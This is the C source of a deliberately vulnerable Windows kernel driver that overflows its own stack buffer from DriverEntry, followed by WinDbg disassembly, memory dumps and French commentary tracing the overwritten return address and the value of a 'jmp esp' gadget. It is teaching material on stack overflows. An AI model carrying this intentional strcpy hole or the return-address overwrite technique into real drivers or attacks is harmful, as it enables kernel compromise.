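/*
 * kbof.c -- deliberately vulnerable test driver: a kernel-mode stack buffer
 * overflow that the driver triggers against itself from DriverEntry.
 * Teaching/PoC code only: it overwrites its own saved ebp and return address
 * on purpose and stops on hard-coded int 3 breakpoints.
 */

/*
 * Frame layout of Mofo() on x86, as confirmed by the disassembly below
 * (sub esp,60h reserves exactly 96 bytes, so Buff sits directly under the
 * saved ebp pushed by the prologue and the return address pushed by call).
 */
enum {
    MOFO_BUF_SIZE   = 96,                                /* UCHAR Buff[96]          */
    SAVED_EBP_SIZE  = 4,                                 /* "push ebp" in prologue  */
    SAVED_EIP_SIZE  = 4,                                 /* pushed by "call Mofo"   */
    RET_ADDR_OFFSET = MOFO_BUF_SIZE + SAVED_EBP_SIZE,    /* 100: Buff -> return address */
    PAYLOAD_SIZE    = RET_ADDR_OFFSET + SAVED_EIP_SIZE   /* 104: bytes needed to cover it */
};

/*
 * Mofo -- copies Str into a 96-byte stack buffer with an unbounded strcpy.
 *
 * Any Str longer than 95 characters overflows Buff: offsets 96..99 land on
 * the saved ebp and offsets 100..103 on the return address, so the function
 * returns to whatever the caller placed there.  This is the bug under study;
 * a real driver would use a bounded copy (e.g. RtlStringCbCopyA with
 * sizeof(Buff)) and never trust the length of Str.
 *
 * The two int 3 stop the kernel debugger before and after the copy so the
 * frame can be dumped; with no kernel debugger attached a kernel-mode int 3
 * normally ends in a bugcheck, so do not load this outside a debug VM.
 *
 * Str: NUL-terminated string, read only.
 * Returns 0 -- reached only if the return address survived the copy.
 */
ULONG Mofo(PUCHAR Str)
{
    UCHAR Buff[MOFO_BUF_SIZE];

    /* Prints the address of Buff so the dump can be read off esp.
     * NOTE(review): %x takes an unsigned int; for a pointer the correct
     * specifier is %p.  It only works here because this is a 32-bit build
     * (the format string is kept so the traced output below still matches). */
    DbgPrint("&Buff : 0x%x\n", &Buff);
    __asm { int 3 }                       /* break 1: frame before the copy */

    /* Unbounded copy from the ntoskrnl strcpy export: no length check, and
     * Buff is not guaranteed to be NUL-terminated if Str is too long.
     * Casts only silence the UCHAR* / char* mismatch; behaviour is unchanged. */
    strcpy((char *)Buff, (const char *)Str);
    __asm { int 3 }                       /* break 2: frame after the copy  */

    return 0;
}

/*
 * DriverUnload -- unload callback; only logs.
 *
 * NOTE(review): PDRIVER_UNLOAD is declared as returning VOID, so assigning
 * this NTSTATUS-returning function to pDriverObject->DriverUnload produces
 * a function-pointer type warning; in practice the kernel ignores the value.
 * DriverObject is intentionally unused.
 */
NTSTATUS DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
    (void)DriverObject;
    DbgPrint("Bye dude");
    return STATUS_SUCCESS;
}

/*
 * DriverEntry -- builds the overflow payload and hands it to Mofo().
 *
 * Payload layout (PAYLOAD_SIZE + 1 bytes, the last one being the NUL that
 * stops strcpy):
 *   [  0,  96)  'A' x 96   fills Buff
 *   [ 96, 100)  'A' x 4    saved ebp of Mofo
 *   [100, 104)  JmpESP     return address of Mofo
 *   [104]       '\0'       terminator
 *
 * JmpESP is declared elsewhere in the file; sizeof(ULONG) bytes are copied
 * from it, so it is presumably a ULONG holding the address of a "jmp esp"
 * gadget -- verify against its definition.  NOTE(review): the traced build
 * below shows no memcpy between the 0x41 memset and the call to Mofo, and
 * the post-copy dump has 41414141 as return address, so the binary that was
 * debugged appears to have been built without this line.
 *
 * pRegistryPath is unused.  Returns STATUS_SUCCESS if Mofo ever returns.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    char Buff[PAYLOAD_SIZE + 1];

    (void)pRegistryPath;
    pDriverObject->DriverUnload = DriverUnload;

    memset(Buff, 0, sizeof(Buff));                 /* leaves the NUL at Buff[104] */
    memset(Buff, 0x41, PAYLOAD_SIZE);              /* 'A' over Buff, saved ebp, saved eip */
    memcpy(Buff + RET_ADDR_OFFSET, &JmpESP, sizeof(ULONG)); /* replace the return address */

    Mofo((PUCHAR)Buff);                            /* does not come back here if the overwrite worked */
    return STATUS_SUCCESS;
}

/*****************************************************/
kd> uf kbof!DriverEntry
kbof!DriverEntry [c:\drivers\bof\kbof.c @ 90]:
   90 fbfa14ea 8bff            mov     edi,edi
   90 fbfa14ec 55              push    ebp
   90 fbfa14ed 8bec            mov     ebp,esp
   90 fbfa14ef 83ec6c          sub     esp,6Ch
   98 fbfa14f2 8b4508          mov     eax,dword ptr [ebp+8]
   98 fbfa14f5 57              push    edi
  103 fbfa14f6 6a1a            push    1Ah
  103 fbfa14f8 c74034d414fafb  mov     dword ptr [eax+34h],offset kbof!DriverUnload (fbfa14d4)
  103 fbfa14ff 59              pop     ecx
  103 fbfa1500 33c0            xor     eax,eax
  103 fbfa1502 8d7d94          lea     edi,[ebp-6Ch]
  103 fbfa1505 f3ab            rep stos dword ptr es:[edi]
  103 fbfa1507 aa              stos    byte ptr es:[edi]
  106 fbfa1508 6a1a            push    1Ah
  106 fbfa150a 59              pop     ecx
  106 fbfa150b b841414141      mov     eax,41414141h
  106 fbfa1510 8d7d94          lea     edi,[ebp-6Ch]
  106 fbfa1513 f3ab            rep stos dword ptr es:[edi]
  118 fbfa1515 8d4594          lea     eax,[ebp-6Ch]
  118 fbfa1518 50              push    eax
  118 fbfa1519 e876ffffff      call    kbof!Mofo (fbfa1494)
  120 fbfa151e 33c0            xor     eax,eax
  120 fbfa1520 5f              pop     edi
  121 fbfa1521 c9              leave
  121 fbfa1522 c20800          ret     8

kd> uf kbof!Mofo
kbof!Mofo [c:\drivers\bof\kbof.c @ 66]:
   66 fbfa1494 8bff            mov     edi,edi
   66 fbfa1496 55              push    ebp
   66 fbfa1497 8bec            mov     ebp,esp
   66 fbfa1499 83ec60          sub     esp,60h
   69 fbfa149c 8d45a0          lea     eax,[ebp-60h]
   69 fbfa149f 50              push    eax
   69 fbfa14a0 688014fafb      push    offset kbof!Mofo+0xffffffff`ffffffec (fbfa1480)
   69 fbfa14a5 e880000000      call    kbof!DbgPrint (fbfa152a)
   69 fbfa14aa 59              pop     ecx
   69 fbfa14ab 59              pop     ecx
   71 fbfa14ac cc              int     3
   73 fbfa14ad 8b4508          mov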
eax,dword ptr [ebp+8]
   73 fbfa14b0 8d55a0          lea     edx,[ebp-60h]
   73 fbfa14b3 2bd0            sub     edx,eax
kbof!Mofo+0x21 [c:\drivers\bof\kbof.c @ 73]:
   73 fbfa14b5 8a08            mov     cl,byte ptr [eax]
   73 fbfa14b7 880c02          mov     byte ptr [edx+eax],cl
   73 fbfa14ba 40              inc     eax
   73 fbfa14bb 84c9            test    cl,cl
   73 fbfa14bd 75f6            jne     kbof!Mofo+0x21 (fbfa14b5)
kbof!Mofo+0x2b [c:\drivers\bof\kbof.c @ 75]:
   75 fbfa14bf cc              int     3
   76 fbfa14c0 33c0            xor     eax,eax
   77 fbfa14c2 c9              leave           <=> mov esp,ebp ; pop ebp
   77 fbfa14c3 c20400          ret     4
/*****************************************************/
Kernel debugger connecté à la VM ; au chargement du driver, on s'arrête sur le premier int 3 de Mofo. L'adresse de Buff affichée par DbgPrint est exactement esp : le buffer de 96 octets occupe [fbdf5ba0, fbdf5c00), juste sous l'ebp sauvegardé (fbdf5c00) et l'adresse de retour (fbdf5c04).

&Buff : 0xfbdf5ba0
Break instruction exception - code 80000003 (first chance)
kbof!Mofo+0x18:
fbfa14ac cc              int     3
kd> r esp
esp=fbdf5ba0
kd> kp
ChildEBP RetAddr
fbdf5c00 fbfa151e kbof!Mofo(unsigned char * Str = 0xfbdf5c10 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")+0x18 [c:\drivers\bof\kbof.c @ 71]
fbdf5c7c 805a69d3 kbof!DriverEntry(struct _DRIVER_OBJECT * pDriverObject = 0x80cfcbe0, struct _UNICODE_STRING * pRegistryPath = 0x80e40000)+0x34 [c:\drivers\bof\kbof.c @ 120]
fbdf5d4c 805a6ca8 nt!IopLoadDriver+0x66c
fbdf5d74 804e47fe nt!IopLoadUnloadDriver+0x45
fbdf5dac 8057dfed nt!ExpWorkerThread+0x100
fbdf5ddc 804fa477 nt!PspSystemThreadStartup+0x34
00000000 00000000 nt!KiThreadStartup+0x16
kd> db fbdf5ba0    (avant le strcpy)
fbdf5ba0  00 00 00 00 00 00 00 00-eb 9b 01 00 00 00 00 00  ................
fbdf5bb0  c8 cb cf 80 b0 53 ea 80-00 00 00 00 01 00 00 00  .....S..........
fbdf5bc0  01 00 00 00 00 00 00 00-30 6b eb 80 fe ff ff ff  ........0k......
fbdf5bd0  b0 53 ea 80 00 00 00 00-40 20 56 80 40 20 56 80  .S......@ V.@ V.
fbdf5be0  01 00 00 00 c4 cb cf 80-00 00 00 00 c8 cb cf 80  ................
fbdf5bf0  00 00 00 00 01 00 00 00-c0 00 00 00 c8 cb cf 80  ................
          [ saved ebp ] [ saved eip ] [    Str    ] [ saved edi de DriverEntry ]
fbdf5c00  7c 5c df fb 1e 15 fa fb-10 5c df fb e0 cb cf 80  |\.......\......
fbdf5c10  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
kd> t
kbof!Mofo+0x2b:
fbfa14bf cc              int     3
kd> db fbdf5ba0    (après le strcpy)
fbdf5ba0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
fbdf5bb0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
fbdf5bc0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
fbdf5bd0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
fbdf5be0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
fbdf5bf0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
          [ saved ebp ] [ saved eip ] [    Str    ]
fbdf5c00  41 41 41 41 41 41 41 41-00 5c df fb e0 cb cf 80  AAAAAAAA.\......
fbdf5c10  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

Les 104 'A' ont recouvert Buff, l'ebp sauvegardé et l'adresse de retour (tous deux à 41414141) ; le 0 terminal de la chaîne a en plus écrasé l'octet de poids faible de l'argument Str (0xfbdf5c10 devient 0xfbdf5c00). Le `ret 4` va donc sauter en 0x41414141 :

kd> t
kbof!Mofo+0x2c:
fbfa14c0 33c0            xor     eax,eax
kd> t
kbof!Mofo+0x2e:
fbfa14c2 c9              leave
kd> t
41414141 ??              ???
kd> db fbdf5ba0    (pourquoi Buff a-t-il été modifié ?)
fbdf5ba0  00 0d db ba 90 ff ff ff-00 00 00 00 00 00 00 00  ................
fbdf5bb0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
fbdf5bc0  00 00 00 00 23 00 00 00-00 00 00 00 23 00 00 00  ....#.......#...
fbdf5bd0  23 00 00 00 90 ff ff ff-00 5b df fb 00 00 00 00  #........[......
fbdf5be0  30 00 00 00 cc 5d df fb-30 00 00 00 78 5c df fb  0....]..0...x\..
fbdf5bf0  3a 26 66 e1 00 00 00 00-41 41 41 41 00 00 00 00  :&f.....AAAA....
fbdf5c00  41 41 41 41 08 00 00 00-46 02 00 00 e0 cb cf 80  AAAA....F.......
fbdf5c10  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

Réponse : ce n'est pas le driver qui a modifié Buff, c'est le processeur. Après `leave` puis `ret 4`, esp vaut fbdf5c0c et l'ancienne trame de Mofo (Buff compris) est de la pile libre, sous esp. La tentative d'exécution en 0x41414141 provoque une faute qui pousse EFLAGS, CS, EIP et le code d'erreur juste sous esp : on lit bien 0x246 (EFLAGS) en fbdf5c08, 0x08 (sélecteur de code noyau) en fbdf5c04, 0x41414141 (EIP fautif) en fbdf5c00 et 0 (code d'erreur) en fbdf5bfc. Le reste de la zone fbdf5ba0–fbdf5bfb est vraisemblablement la KTRAP_FRAME que le gestionnaire de faute construit ensuite (les sélecteurs 0x23 et 0x30, et l'ebp 0x41414141 en fbdf5bf8, sont cohérents avec cette interprétation). Autrement dit : tout ce qui se trouve sous esp au moment de la faute est réutilisé par le noyau, d'où l'intérêt d'un gadget `jmp esp` qui ne dépend que des octets situés au-dessus de l'adresse de retour.